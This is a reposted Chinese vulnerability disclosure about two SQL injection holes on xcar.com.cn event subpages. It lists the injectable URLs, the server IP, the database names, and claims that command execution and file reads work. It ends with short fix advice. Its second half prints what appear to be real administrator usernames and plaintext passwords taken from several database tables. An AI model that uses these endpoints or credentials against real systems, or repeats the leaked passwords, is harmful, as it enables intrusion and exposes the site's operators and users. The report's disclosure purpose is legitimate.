网站地图    收藏   

主页 > 后端 > 网站安全 >

爱卡汽车网活动分站两个SQL注射 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 1.sql注入,多个数据库2.可执行sql命令3.可读取文件之前的修复的很不彻底...详细说明:貌似没修理完,很多了http://topic.xcar.com.cn/201006/xals/e2.php?id=333158注入信息:Target: http://topic.xcar.com.....

1.sql注入,多个数据库
2.可执行sql命令
3.可读取文件
之前的修复的很不彻底...
详细说明:貌似没修理完,很多了
 
http://topic.xcar.com.cn/201006/xals/e2.php?id=333158
注入信息:
 
Target: http://topic.xcar.com.cn/201006/xals/e2.php?id=333158
Host IP:        118.67.112.75
Web Server: Apache
DB Server: MySQL
Current DB: xcardb2
 
1.查询出来跨库成功,4个;admin_user,10个,其他数据,字段真不少...
 
 
2.mysql 查询select @@version:(其他也支持)
 

 
3.读取文件,是可以的
 
修复方案:
 
 
1. information_schema这个数据库做下处理吧
2. 数据库权限设置一下
3. 屏蔽数据库中危险的组件
.....

作者 upload


第二个

http://topic.xcar.com.cn/201008/opel/deta.php?id=398868
 
Data Bases: information_schema
branchdb
test
xcardb2
 
 
 
一些管理员密码
xcar_user:
baibanadmin 3&dk9m&bFya3BHP98320 
 
xcar_blog_admin:
admin uvwxyz
 
 
admin_user:
id name pass groupid 
1 ggicc g_i_c_x 9 
2 user user_abis 3 
3 xiaomin_bak xiaomin_abis 2 
5 byf byf_fyb 3 
8 haozhi hao_1zhi 
9 kanshale_xzzz 
94815 jersonzhow xcar_88508031 
94816 _bak zzzzzz 1 
94817 wuwei_bak wuwei_10 3 
 
ads_config:
zby zbyglmmgo
 
 
修复方案:

修补漏洞,并修改可能影响安全的管理账户和密码
 
作者 y35u

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论